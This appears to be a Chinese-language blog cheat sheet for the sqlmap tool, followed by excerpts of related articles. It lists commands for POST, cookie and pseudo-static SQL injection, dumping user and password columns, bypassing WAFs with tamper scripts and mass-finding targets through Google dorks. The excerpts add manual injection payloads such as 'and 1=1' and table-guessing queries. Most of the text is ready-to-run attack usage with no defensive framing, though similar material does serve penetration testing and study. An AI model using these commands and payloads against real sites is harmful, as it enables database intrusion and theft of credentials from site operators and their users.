SqlMap post cookie注入小结

sqlmap

SqlMap  POST注入

自动检测
sqlmap -u “http://www.xxx.com/news?id=1″ –smart –level 3 –users

单个注入
sqlmap -u “http://www.xxx.com/1.php” –data=”id=1″

多个post值注入
sqlmap -u “http://www.xxx.com/vuln.php” –data=”query=foobar;id=1″ –param-del=”;” -f –banner –dbs –users

自动注入
sqlmap -u http://xxxx.xxxx.com/Login.asp –forms

导入文件注入
sqlmap -r key.txt “name,pass”  //不知道  key.txt 的位置

登录post注册

sqlmap -u “http://www.xxx.com/vuln.php” –data=”query=foobar;id=1″ –param-del=”;” –cookies=”登录成功的cookie信息” -f –banner –dbs –users

SqlMap COOkie 注入

单个注入
sqlmap “http://127.0.0.1/base.php” –cookie “id=1″  –dbs –level 2
sqlmap -u “url” –cookie “id=” –clumns -T 表段 –level 2
sqlmap -u “url” –cookie “id=” –dump -T 表段 -C “user,pass” –level 2

伪静态注入:

sqlmap -u url/x*.html –dbs

请求延时注入:
sqlmap –dbs -u usr/x*.html –delay 1(时间,可随意)
sqlmap –dbs -u usr/x*.html –safe-freq 1(次数,可随意)
————————————————————————–

绕过WAF防火墙:
sqlmap -u url -v 3 –dbs –batch –tamper “space2morehash.py”
1.space2hash.py 2.base64encode.py 3.charencode.py
————————————————————————–

Google批量检测注入:
sqlmap -g 关键词

Request(请求)::
这些选项可以用来指定如何连接到目标URL。

–data=DATA         通过POST发送的数据字符串
–cookie=COOKIE     HTTP Cookie头
–cookie-urlencode  URL 编码生成的cookie注入
–drop-set-cookie   忽略响应的Set – Cookie头信息
–user-agent=AGENT  指定  HTTP User – Agent头
–random-agent      使用随机选定的HTTP User – Agent头
–referer=REFERER   指定  HTTP Referer头
–headers=HEADERS   换行分开,加入其他的HTTP头
–auth-type=ATYPE   HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
–auth-cred=ACRED   HTTP身份验证凭据(用户名:密码)
–auth-cert=ACERT   HTTP认证证书(key_file,cert_file)
–proxy=PROXY       使用HTTP代理连接到目标URL
–proxy-cred=PCRED  HTTP代理身份验证凭据(用户名:密码)
–ignore-proxy      忽略系统默认的HTTP代理
–delay=DELAY       在每个HTTP请求之间的延迟时间,单位为秒
–timeout=TIMEOUT   等待连接超时的时间(默认为30秒)
–retries=RETRIES   连接超时后重新连接的时间(默认3)
–scope=SCOPE       从所提供的代理日志中过滤器目标的正则表达式
–safe-url=SAFURL   在测试过程中经常访问的url地址

时间: 2024-08-06 20:31:10

SqlMap post cookie注入小结的相关文章

3.sqlmap学习笔记之Cookie注入

Cookie注入: 1.假设这个网址"http://www.xxx.org/Show.asp?id=9"存在注入点.2.sqlmap命令提示符下输入下列内容进行跑表. sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --table --level 2 假设返回内容如下,说明是access数据库. ------------------------- [INFO] resuming ba

对于sqli-labs基础篇全程使用sqlmap不用手工注入(七夕礼物!!!)

个人简介:萌新一枚,渣渣一个,全程划水,会喊六六 本文断断续续已经写了三天了,其中查过很多其他人的博文 但是发现大多数人关于sql-labs使用的都是手工注入, 由于自己太渣,只能去找工具去注入(QAQ) 希望各位大佬不要见怪呀!! 不论喜欢与否都可以留言哦!!!! 关于sqli-labs的解题技巧,使用sqlmap注入,尽量少使用手工注入的方式 关于sql-labs中的1-4我已经在另一篇文章中写出具体的过程: https://www.cnblogs.com/lxz-1263030049/p/

cookie注入原理及注入检测

通常我们的开发人员在开发过程中会特别注意到防止恶意用户进行恶意的注入操作,因此会对传入的参数进行适当的过滤,但是很多时候,由于个人对安全技术了解的不同,有些开发人员只会对get,post这种方式提交的数据进行参数过滤. 但我们知道,很多时候,提交数据并非仅仅只有get\post这两种方式,还有一种经常被用到的方式:request("xxx"),即request方法 通过这种方法一样可以从用户提交的参数中获取参数值,这就造成了cookie注入的最基本条件:使用了request方法,但是注

cookie注入

---看到cookie注入,自己动手来实践一下 通过谷歌搜索找到一个目标站点:inurl:asp?id=166 首先按照一般的方式来注入 后面加and 1=1 可见是使用了防注入的, 但是目前我们是使用get方式提交的参数,那现在我们将“id=166”这个参数使用cookie提交看看程序对数据接收是否直接使用 request("xx")的方式?要更改成cookie方式提交,我们首先要访问正常的页面,等页面完全打开之后,我们将IE地址栏清空,然后写 上:javascript:alert(

注入语句详解(get注入,cookie注入,搜索型注入等)

注意:对于普通的get注入,如果是字符型,前加'   后加 and ''=' 拆半法 ###################################### and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表. and exists (select * from admin) and exists(select id from admin) and exists(s

Burosuite抓包Sqlmap学习Sql注入

在sqlmap中加入--proyxy参数: --proxy "http://127.0.0.1:8080" 如下图所示: 回车以后sqlmap会自动抓到数据包: 我们选择向前(forward)即可: 可以看到参数ID的后面多了一些URL的编码.可以复制然后去解开看看. 简单学习.嘻嘻.每天进步一点点. THE END Burosuite抓包Sqlmap学习Sql注入

Web攻防系列教程之 Cookie注入攻防实战

摘要:随着网络安全技术的发展,SQL注入作为一种很流行的攻击方式被越来越多的人所知晓.很多网站也都对SQL注入做了防护,许多网站管理员的做法就是添加一个防注入程序.这时我们用常规的手段去探测网站的SQL注入漏洞时会被防注入程序阻挡,遇到这种情况我们该怎么办?难道就没有办法了吗?答案是否定的. 随着网络安全技术的发展,SQL注入作为一种很流行的攻击方式被越来越多的人所知晓.很多网站也都对SQL注入做了防护,许多网站管理员的做法就是添加一个防注入程序.这时我们用常规的手段去探测网站的SQL注入漏洞时

SQL手工注入小结

第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉.否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息. 数字型:and 1=1 and 1=2 判断是否存在注入 字符型:' and '1'='1 ' and '1'='2 搜索型: 关键字%' and 1=1 and '%'='% 关键字%' and 1=2 and '%'='% IIS报错情况下使用: and user>0 (判

网络安全系列之十七 cookie注入(BurpSuite+穿山甲)

在Web页面中,数据提交有3种方式:get.post.cookie.传统的在注入点后面加上"and 1=1"之类的注入命令,这都属于是get提交方式.而很多网站在进行过滤时,也大都是只针对get方式进行过滤,因而这就为Cookie注入提供了机会. 在之前的博文中已经通过注入中转的方式介绍了cookie注入,为了加深对cookie注入的了解,这里使用BurpSuite进行抓包,并利用穿山甲pangolin来进行cookie注入.仍然使用之前搭建好的实验环境,目标网站采用南方数据5.0模板